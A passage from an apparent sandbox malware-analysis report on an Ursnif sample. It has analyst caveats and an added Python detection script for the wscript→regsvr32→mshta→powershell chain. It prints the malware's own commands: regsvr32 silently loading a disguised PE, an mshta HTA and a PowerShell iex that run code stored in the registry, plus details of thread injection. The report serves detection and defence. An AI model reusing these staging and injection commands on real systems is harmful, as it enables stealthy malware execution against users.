Source: explorer.exe, 00000013.00000002.1067504419.000000000519F000.00000004.00000001.sdmp | Binary or memory string: C:\PROGRAM FILES\IBTDGTUVOLOWUIAFTBXTXIFWWSUPNVOVMTHRJQVKDYJRYEFHUTMEPMNEILIRTKKOUTYFRR\CIBDSRGXWTZZPFUZMMIHGHCV.EXE
Source: explorer.exe, 00000013.00000000.1010797574.0000000009D8B000.00000004.00000001.sdmp | Binary or memory string: {6D809377-6AF0-444B-8957-A3773F02200E}\IBTDGTUVOLOWUIAFTBXTXIFWWSUPNVOVMTHRJQVKDYJRYEFHUTMEPMNEILIRTKKOUTYFRR\CIBDSRGXWTZZPFUZMMIHGHCV.EXE
Source: explorer.exe, 00000013.00000000.1010797574.0000000009D8B000.00000004.00000001.sdmp | Binary or memory string: {6D809377-6AF0-444B-8957-A3773F02200E}\IBTDGTUVOLOWUIAFTBXTXIFWWSUPNVOVMTHRJQVKDYJRYEFHUTMEPMNEILIRTKKOUTYFRR\CIBDSRGXWTZZPFUZMMIHGHCV.EXE2WM9
Source: explorer.exe, 00000013.00000000.1010797574.0000000009D8B000.00000004.00000001.sdmp | Binary or memory string: {6D809377-6AF0-444B-8957-A3773F02200E}\IBTDGTUVOLOWUIAFTBXTXIFWWSUPNVOVMTHRJQVKDYJRYEFHUTMEPMNEILIRTKKOUTYFRR\CIBDSRGXWTZZPFUZMMIHGHCV.EXESM
Source: explorer.exe, 00000013.00000000.1010797574.0000000009D8B000.00000004.00000001.sdmp | Binary or memory string: {6D809377-6AF0-444B-8957-A3773F02200E}\IBTDGTUVOLOWUIAFTBXTXIFWWSUPNVOVMTHRJQVKDYJRYEFHUTMEPMNEILIRTKKOUTYFRR\CIBDSRGXWTZZPFUZMMIHGHCV.EXERO/MQ
Source: explorer.exe, 00000013.00000002.1067504419.000000000519F000.00000004.00000001.sdmp | Binary or memory string: TC:\PROGRAM FILES\IBTDGTUVOLOWUIAFTBXTXIFWWSUPNVOVMTHRJQVKDYJRYEFHUTMEPMNEILIRTKKOUTYFRR\CIBDSRGXWTZZPFUZMMIHGHCV.EXE
Caveat: all seven hits are strings in explorer.exe memory, not code in the sample. They are one path to a randomly named executable under Program Files ({6D809377-6AF0-444B-8957-A3773F02200E} is the known-folder ID of the 64-bit Program Files directory, so both spellings name the same file); the trailing AM+, 2WM9, SM, RO/MQ and the leading T are adjacent memory, not part of the name. Confirm what that executable is on the analysis host before reading this as a sandbox check by the sample.
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7210
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1552
Found large amount of non-executed APIs
Source: C:\Windows\SysWOW64\regsvr32.exe | API coverage: 9.4 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2376 | Thread sleep time: -922337203685477s >= -30000s
Caveat: 922337203685477 is (2^63 - 1) / 10^4, i.e. the largest 64-bit relative timeout converted from 100-nanosecond ticks to milliseconds: an infinite wait. Thread.Sleep(Timeout.Infinite) and an INFINITE WaitForSingleObject inside a .NET host such as powershell.exe produce exactly this value, so on its own it is weak evidence of sleep-based evasion.
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\SysWOW64\regsvr32.exe | Last function: Thread delayed
Contains functionality to enumerate / list files inside a directory
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_0507CDF2 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_0508940E RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_05078181 lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose
Contains functionality to query local drives
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_05087CDC wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)
Source: explorer.exe, 00000013.00000000.1002199853.0000000007560000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000013.00000000.1002199853.0000000007560000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000013.00000000.1002199853.0000000007560000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000013.00000000.1002199853.0000000007560000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Caveat: these four strings are standard Windows Hyper-V Host Compute Service error messages found in explorer.exe memory; they do not by themselves show a VM check in the sample.
Queries a list of all running processes
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation

Anti Debugging:

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_00401C57 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,LdrInitializeThunk,MapViewOfFile,GetLastError,CloseHandle,GetLastError
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_00414021 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Note: IsDebuggerPresent followed by SetUnhandledExceptionFilter, UnhandledExceptionFilter and TerminateProcess is the call sequence of the MSVC CRT's own fault reporting (_call_reportfault / __report_gsfailure), and 5_2_00417A33 below carries the CRT's __NMSG_WRITE and _raise next to the same calls, so this hit is consistent with statically linked runtime code rather than a deliberate debugger check.
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_05086450 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress
Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_00431048 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_00430F7E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_00430B88 push dword ptr fs:[00000030h]
Note: fs:[30h] is the PEB pointer of a 32-bit process (the injected code runs in the SysWOW64 regsvr32.exe). Reading it inline gives access to BeingDebugged, NtGlobalFlag and the loader module lists without calling an API that a monitor could hook; the three functions live at 0x0043xxxx, i.e. in the same image as the CRT code above, so they may equally be the runtime's own PEB access.
Contains functionality to register its own exception handler
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_0040223F InitializeCriticalSection,TlsAlloc,RtlAddVectoredExceptionHandler,GetLastError
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_00414021 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_00417A33 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_0041248E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_0507C0D6 ConvertStringSecurityDescriptorToSecurityDescriptorA,StrRChrA,_strupr,lstrlen,LdrInitializeThunk,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler

HIPS / PFW / Operating System Protection Evasion:

Benign windows process drops PE files
Source: C:\Windows\System32\wscript.exe | File created: TsCrxrp.txt.0.dr
Allocates memory in foreign processes
Source: C:\Windows\SysWOW64\regsvr32.exe | Memory allocated: C:\Windows\System32\control.exe base: 400000 protect: page execute and read and write
Creates a thread in another existing process (thread injection)
Source: C:\Windows\System32\control.exe | Thread created: C:\Windows\explorer.exe EIP: 87D01000
Maps a DLL or memory area into another process
Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\SysWOW64\regsvr32.exe | Thread register set: target process: 1784
Writes to foreign memory regions
Source: C:\Windows\SysWOW64\regsvr32.exe | Memory written: C:\Windows\System32\control.exe base: 400000
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\\TsCrxrp.txt
Source: C:\Windows\SysWOW64\regsvr32.exe | Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\AppDataLow\\Software\\Microsoft\\27F8DA9B-5A17-F1FE-9C4B-2EB590AF42B9\\Analager'));if(!window.flag)close()</script>'
Source: C:\Windows\SysWOW64\regsvr32.exe | Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe /?
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\27F8DA9B-5A17-F1FE-9C4B-2EB590AF42B9').BingckDS))
Chain as recorded: wscript.exe drops a PE as TsCrxrp.txt and loads it with regsvr32.exe -s (the .txt extension is cosmetic; regsvr32 loads whatever path it is given and calls DllRegisterServer). The loaded Ursnif module starts mshta.exe with an inline HTA that eval()s the Analager value of HKCU\Software\AppDataLow\Software\Microsoft\27F8DA9B-5A17-F1FE-9C4B-2EB590AF42B9, and that HTA starts powershell.exe to iex the ASCII-decoded BingckDS value of the same key, so the second and third stages live only in the registry. regsvr32.exe also starts control.exe /? as an injection host (RWX allocation and write at base 0x400000, thread context modified in PID 1784, which is control.exe), and the injected control.exe then creates a thread in explorer.exe at EIP 0x87D01000.
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown | Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\AppDataLow\\Software\\Microsoft\\27F8DA9B-5A17-F1FE-9C4B-2EB590AF42B9\\Analager'));if(!window.flag)close()</script>'
Source: C:\Windows\SysWOW64\regsvr32.exe | Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\AppDataLow\\Software\\Microsoft\\27F8DA9B-5A17-F1FE-9C4B-2EB590AF42B9\\Analager'));if(!window.flag)close()</script>'
May try to detect the Windows Explorer process (often used for injection)
Source: regsvr32.exe, 00000004.00000002.960076221.0000000001530000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.964562442.0000000003030000.00000002.00000001.sdmp, control.exe, 00000012.00000002.1089655441.000002A0B3AD0000.00000002.00000001.sdmp, explorer.exe, 00000013.00000000.954891311.0000000000BB0000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
Source: regsvr32.exe, 00000004.00000002.960076221.0000000001530000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.964562442.0000000003030000.00000002.00000001.sdmp, control.exe, 00000012.00000002.1089655441.000002A0B3AD0000.00000002.00000001.sdmp, explorer.exe, 00000013.00000000.954891311.0000000000BB0000.00000002.00000001.sdmp | Binary or memory string: Progman
Source: explorer.exe, 00000013.00000002.1072159051.0000000009BAD000.00000004.00000001.sdmp | Binary or memory string: Shell_TrayWnd#nt
Source: regsvr32.exe, 00000004.00000002.960076221.0000000001530000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.964562442.0000000003030000.00000002.00000001.sdmp, control.exe, 00000012.00000002.1089655441.000002A0B3AD0000.00000002.00000001.sdmp, explorer.exe, 00000013.00000000.954891311.0000000000BB0000.00000002.00000001.sdmp | Binary or memory string: Progmanlock
Source: regsvr32.exe, 00000004.00000002.960076221.0000000001530000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.964562442.0000000003030000.00000002.00000001.sdmp, control.exe, 00000012.00000002.1089655441.000002A0B3AD0000.00000002.00000001.sdmp, explorer.exe, 00000013.00000000.954891311.0000000000BB0000.00000002.00000001.sdmp | Binary or memory string: =Program Managerb
Caveat: Shell_TrayWnd and Progman are the window class names of the taskbar and the desktop. They appear identically in both regsvr32.exe instances, control.exe and explorer.exe, which is consistent with a shared system DLL rather than strings the sample carries; the stronger indicator that the sample locates explorer.exe is the GetShellWindow / GetWindowThreadProcessId / OpenProcess sequence in function 5_2_0507476B listed under Language, Device and Operating System Detection below.
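An added detection example, not part of the Joe Sandbox report and not code from the sample: the rules below replay the four Process created entries of this section as constructed process-creation records (parent image, child image, command line), flag each link of the regsvr32 / mshta / powershell chain, and correlate the two registry reads into one hunting key. The SAMPLE_EVENTS list, the benign msiexec/vendor.dll control record and the rule names are my assumptions modelled on the report's entries; nothing here was captured from the sandbox.

```python
"""Rules for the registry-staged LOLBin chain recorded in this report:
wscript.exe -> regsvr32.exe -s <non-DLL> -> mshta.exe (inline HTA, RegRead)
-> powershell.exe (iex of a registry value), plus regsvr32.exe spawning
control.exe /? as an injection host. Added example; events are constructed."""
import re
from dataclasses import dataclass
from typing import Dict, List, Set, Tuple

# Constructed (parent image, child image, child command line) records modelled on the
# "Process created" entries of the report. The last record is an invented benign control.
SAMPLE_EVENTS: List[Tuple[str, str, str]] = [
    (r"C:\Windows\System32\wscript.exe", r"C:\Windows\System32\regsvr32.exe",
     r"'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\\TsCrxrp.txt"),
    (r"C:\Windows\SysWOW64\regsvr32.exe", r"C:\Windows\System32\mshta.exe",
     r"'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);"
     r"eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\AppDataLow"
     r"\\Software\\Microsoft\\27F8DA9B-5A17-F1FE-9C4B-2EB590AF42B9\\Analager'));"
     r"if(!window.flag)close()</script>'"),
    (r"C:\Windows\SysWOW64\regsvr32.exe", r"C:\Windows\System32\control.exe",
     r"C:\Windows\system32\control.exe /?"),
    (r"C:\Windows\System32\mshta.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     r"'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII"
     r".GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\27F8DA9B-5A17-F1FE-9C4B-2EB590AF42B9')"
     r".BingckDS))"),
    (r"C:\Windows\System32\msiexec.exe", r"C:\Windows\System32\regsvr32.exe",
     r"regsvr32.exe /s C:\Program Files\Vendor\vendor.dll"),   # benign control, invented
]


@dataclass(frozen=True)
class Finding:
    rule: str
    child: str
    detail: str


LOADABLE_EXTS = {"dll", "ocx", "ax"}   # what regsvr32 legitimately registers
_REGSVR = re.compile(r"regsvr32\.exe'?\s+[-/]s\s+(.+?)\s*$", re.I)
_REGREAD = re.compile(r"RegRead\('([^']+)'\)", re.I)
_GP = re.compile(r"\bgp\s+'(HK[A-Z_]+:[^']+)'\s*\)\.(\w+)", re.I)


def basename(image: str) -> str:
    return image.strip("'\"").replace("/", "\\").rsplit("\\", 1)[-1].lower()


def normalize_key(path: str) -> str:
    """Bring the JScript-escaped spelling (doubled backslashes) and the PowerShell drive
    spelling (HKCU:Software...) to one HKCU-backslash form so the two stages correlate."""
    path = path.replace("\\\\", "\\")
    path = re.sub(r"^(HK[A-Z_]+):\\?", r"\1\\", path, flags=re.I)
    return path.rstrip("\\")


def evaluate(parent: str, child: str, cmd: str) -> List[Finding]:
    """Apply the chain rules to one process-creation record."""
    p, c = basename(parent), basename(child)
    found: List[Finding] = []
    if c == "regsvr32.exe":
        m = _REGSVR.search(cmd)
        if m:
            target = m.group(1).strip("'\"")
            fname = target.rsplit("\\", 1)[-1].lower()
            ext = fname.rsplit(".", 1)[-1] if "." in fname else ""
            if ext not in LOADABLE_EXTS:   # silent registration of a .txt: a renamed PE
                found.append(Finding("regsvr32_silent_nondll", c, f"{target} (parent {p})"))
    if c == "mshta.exe" and "<hta:application>" in cmd.lower():
        m = _REGREAD.search(cmd)
        detail = normalize_key(m.group(1)) if m else "inline HTA without RegRead"
        found.append(Finding("mshta_inline_hta_regread", c, detail))
    if c == "powershell.exe" and re.search(r"\biex\b", cmd, re.I):
        m = _GP.search(cmd)
        detail = normalize_key(m.group(1)) + "\\" + m.group(2) if m else "iex without registry read"
        found.append(Finding("powershell_iex_registry_value", c, detail))
    if p == "regsvr32.exe" and c == "control.exe":   # control.exe /? only serves as an injection host
        found.append(Finding("regsvr32_spawns_control", c, cmd))
    return found


def scan(events: List[Tuple[str, str, str]]) -> List[Finding]:
    return [f for ev in events for f in evaluate(*ev)]


def staged_registry_iocs(findings: List[Finding]) -> Dict[str, Set[str]]:
    """Registry values read by the HTA and PowerShell stages, grouped by key. One key
    feeding both stages is the artefact to hunt for on other hosts."""
    iocs: Dict[str, Set[str]] = {}
    for f in findings:
        if f.rule in ("mshta_inline_hta_regread", "powershell_iex_registry_value") and "\\" in f.detail:
            key, value = f.detail.rsplit("\\", 1)
            iocs.setdefault(key, set()).add(value)
    return iocs


if __name__ == "__main__":
    results = scan(SAMPLE_EVENTS)
    for f in results:
        print(f"{f.rule:30} {f.child:15} {f.detail}")
    for key, values in staged_registry_iocs(results).items():
        print("hunt:", key, sorted(values))
```

The extension rule is deliberately narrow (anything regsvr32 silently loads that is not a .dll/.ocx/.ax), because legitimate installers do call regsvr32 /s; the control record shows that path not firing. The key returned by staged_registry_iocs is the one to sweep other hosts for, since both the HTA and the PowerShell stage read values under it.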

Language, Device and Operating System Detection:

Contains functionality locales information (e.g. system language)
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_004010EC VirtualProtectEx,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_00419765 LdrInitializeThunk,GetLocaleInfoA
Contains functionality to query CPU information (cpuid)
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_0507733B cpuid
Queries the installation date of Windows
Source: C:\Windows\SysWOW64\regsvr32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation (6 entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation (5 entries)
Contains functionality to create pipes for IPC
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_05074134 CreateNamedPipeA,GetLastError,CloseHandle,GetLastError
Contains functionality to query local / system time
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_00401C57 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,LdrInitializeThunk,MapViewOfFile,GetLastError,CloseHandle,GetLastError
Contains functionality to query the account / user name
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_0507476B RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA
Contains functionality to query windows version
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_004017E2 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError
Queries the cryptographic machine GUID
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Note: the volume-information entries come from powershell.exe and are the .NET runtime touching its own assemblies and catalog files, not sample activity. InstallDate, MachineGuid, the user name, locale and Windows version are the queries a practitioner should watch: the hash-like system and user values in the Malware Configuration below are per-victim identifiers, and these are the obvious inputs, though which fields feed them is not shown in this report.

Stealing of Sensitive Information:

Yara detected Ursnif
Source: Yara match | File source: 00000005.00000003.810195397.00000000054B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.923006439.00000000056B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.968635688.0000000005070000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.810012568.00000000054B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.809504976.00000000054B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.810318612.00000000054B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.809358127.00000000054B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000003.937070436.000002A0B34C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.838670762.000000000533B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.810276676.00000000054B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.1086943730.000000000037E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.809661520.00000000054B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.809089457.00000000054B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: regsvr32.exe PID: 4888, type: MEMORY
Source: Yara match | File source: Process Memory Space: control.exe PID: 1784, type: MEMORY

Remote Access Functionality:

Yara detected Ursnif
Source: Yara match | File source: the same 13 memory dumps and the process memory spaces of regsvr32.exe (PID 4888) and control.exe (PID 1784) listed under Stealing of Sensitive Information above; the report repeats the rule hit under both categories.

Malware Configuration

Threatname: Ursnif

{"server": "730", "os": "10.0_0_17134_x64", "version": "250137", "uptime": "242", "system": "ecde5b0ce2df094efe45e0bf22cd4877hh", "size": "200777", "crc": "2", "action": "00000000", "id": "3000", "time": "1586395395", "user": "8a8ed6d154c8a3b79c4b2eb5a02b1ead", "hash": "0x43f98375", "soft": "3"}

Field notes: os is the analysis VM (Windows 10 build 17134, i.e. 1803, x64); time is a Unix timestamp (1586395395 = 2020-04-09 01:23:15 UTC); system and user are hash-like per-victim identifiers; uptime is presumably seconds since boot (242, consistent with a freshly booted sandbox). The report does not show which host attributes feed the system and user values.

Behavior Graph

Graph rendered as text; recoverable content: Behavior Graph ID 221263, Sample open_attach_p2y.js, Startdate 08/04/2020, Architecture WINDOWS, Score 100. DNS/IP node: site-cdn.onenote.net. Signatures at the root: Multi AV Scanner detection for domain / URL; Found malware configuration; Multi AV Scanner detection for dropped file; 10 other signatures. Process nodes: wscript.exe, started from the sample, dropped C:\Users\user\AppData\Local\...\TsCrxrp.txt (PE32; signature: Benign windows process drops PE files) and started regsvr32.exe; iexplore.exe (4 registry values, 427 files), started from the sample, started iexplore.exe (10, 258), iexplore.exe (258) and a further iexplore.exe.